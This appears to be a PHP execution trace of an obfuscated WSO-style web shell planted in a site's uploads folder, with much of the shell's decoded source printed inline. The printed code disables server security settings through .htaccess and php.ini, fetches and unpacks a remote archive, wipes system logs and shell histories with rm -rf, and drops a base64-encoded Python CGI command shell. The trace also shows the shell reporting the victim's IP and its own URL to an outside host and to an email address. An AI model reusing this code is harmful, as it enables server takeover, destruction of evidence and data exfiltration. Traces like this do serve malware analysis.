\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n \');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "


";\r\n echo \'
\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo " ";\r\n } else{ echo \'
Hata! Dosya indirilirken kritik bir hata oluÅŸtu.
\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo " ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'

Delete Logs

\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'
\r\n [OK] Delete: /tmp/logs
\r\n [OK] Delete: /root/.ksh_history
\r\n [OK] Delete: /root/.bash_history
\r\n [OK] Delete: /usr/local/apache/logs
\r\n [OK] Delete: /usr/local/apache/log
\r\n [OK] Delete: /var/apache/logs
\r\n [OK] Delete: /var/apache/log
\r\n [OK] Delete: /var/run/utmp
\r\n [OK] Delete: /var/adm
\r\n [OK] Delete: /etc/wtmp
\r\n [OK] Delete: $HISTFILE
\r\n [OK] Delete: /var/log/lastlog
\r\n [OK] Delete: /var/log/wtmp
\r\n
\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya aç\r\nı\r\nlamadı\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo " ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\nSender Yazdirildi.
SITE YOL : \'.$yol.\'
Sender Yolu : js/js.php\';\r\n $header .= "From: SheLL Boot \\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n\r\n' /var/www/html/uploads/wsoo.php(4) : eval()'d code 1 0 4 13 0 0.009187 1143928 base64_decode 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 16 1 'aHR0cDovL2J5cjAwdC5jby9sLQ==' 4 13 1 0.009209 1144016 4 13 R 'http://byr00t.co/l-' 4 14 0 0.009226 1143984 GetIP 1 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 16 0 5 15 0 0.009240 1143984 getenv 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 3 1 'HTTP_CLIENT_IP' 5 15 1 0.009257 1144016 5 15 R FALSE 5 16 0 0.009271 1143984 getenv 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 5 1 'HTTP_X_FORWARDED_FOR' 5 16 1 0.009286 1144016 5 16 R FALSE 5 17 0 0.009300 1143984 getenv 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 12 1 'REMOTE_ADDR' 5 17 1 0.009314 1144056 5 17 R '127.0.0.1' 4 A /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 12 $ip = '127.0.0.1' 4 14 1 0.009342 1144024 4 14 R '127.0.0.1' 4 18 0 0.009357 1144048 base64_encode 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 16 1 'http://localhost/uploads/wsoo.php' 4 18 1 0.009372 1144160 4 18 R 'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzb28ucGhw' 3 A /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 16 $x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzb28ucGhw' 4 19 0 0.009416 1144040 function_exists 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 17 1 'curl_init' 4 19 1 0.009431 1144080 4 19 R TRUE 4 20 0 0.009444 1144040 curl_init 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 19 0 4 20 1 0.009466 1144952 4 20 R resource(3) of type (curl) 3 A /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 19 $ch = resource(3) of type (curl) 4 21 0 0.009495 1144952 curl_setopt 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 10002 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzb28ucGhw' 4 21 1 0.009515 1145048 4 21 R TRUE 4 22 0 0.009528 1144952 curl_setopt 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 19913 TRUE 4 22 1 0.009544 1145048 4 22 R TRUE 4 23 0 0.009557 1144952 curl_exec 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl) 4 23 1 0.051600 1144984 4 23 R '' 3 A /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 19 $gitt = '' 4 24 0 0.051664 1144952 curl_close 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl) 4 24 1 0.051733 1144096 4 24 R NULL 4 25 0 0.051751 1144064 file_get_contents 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 21 1 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzb28ucGhw' 4 25 1 1.000782 1147760 4 25 R '' 3 A /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 21 $gitt = '' 3 A /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 26 $auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf' 3 A /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 27 $color = '#00ff66' 3 A /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 28 $default_action = 'FilesMan' 4 26 0 1.000990 1147720 define 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 29 2 'SELF_PATH' '/var/www/html/uploads/wsoo.php(4) : eval()\'d code(1) : eval()\'d code' 4 26 1 1.001040 1147824 4 26 R TRUE 4 27 0 1.001056 1147752 strpos 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 30 2 'python-requests/2.25.1' 'Google' 4 27 1 1.001072 1147824 4 27 R FALSE 4 28 0 1.001110 1147752 session_start 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 32 0 4 28 1 1.001217 1148504 4 28 R TRUE 4 29 0 1.001244 1148504 error_reporting 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 33 1 0 4 29 1 1.001268 1148544 4 29 R 0 4 30 0 1.001304 1148504 ini_set 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 34 2 'error_log' NULL 4 30 1 1.001331 1148576 4 30 R '' 4 31 0 1.001354 1148504 ini_set 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 35 2 'display_errors' 0 4 31 1 1.001378 1148576 4 31 R '' 4 32 0 1.001400 1148504 ini_set 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 36 2 'log_errors' 0 4 32 1 1.001425 1148576 4 32 R '1' 4 33 0 1.001458 1148504 ini_set 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 37 2 'max_execution_time' 0 4 33 1 1.001491 1148608 4 33 R '30' 4 34 0 1.001505 1148504 set_time_limit 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code(1) : eval()'d code 38 1 0 4 34 1 1.001520 1148568 4 34 R FALSE 3 12 1 1.001543 1150000 2 7 1 1.001561 1062976 1 3 1 1.001568 1061400 1 35 0 1.001577 1061432 Error->__toString 0 Unknown 0 0 2 36 0 1.001593 1061512 Error->getTraceAsString 0 Unknown 0 0 2 36 1 1.001605 1061768 2 36 R '#0 /var/www/html/uploads/wsoo.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wsoo.php(4): eval()\n#2 {main}' 1 35 1 1.001628 1065904 1 35 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wsoo.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wsoo.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wsoo.php(4): eval()\n#2 {main}' 1.001693 986400 TRACE END [2023-02-12 23:03:49.910212]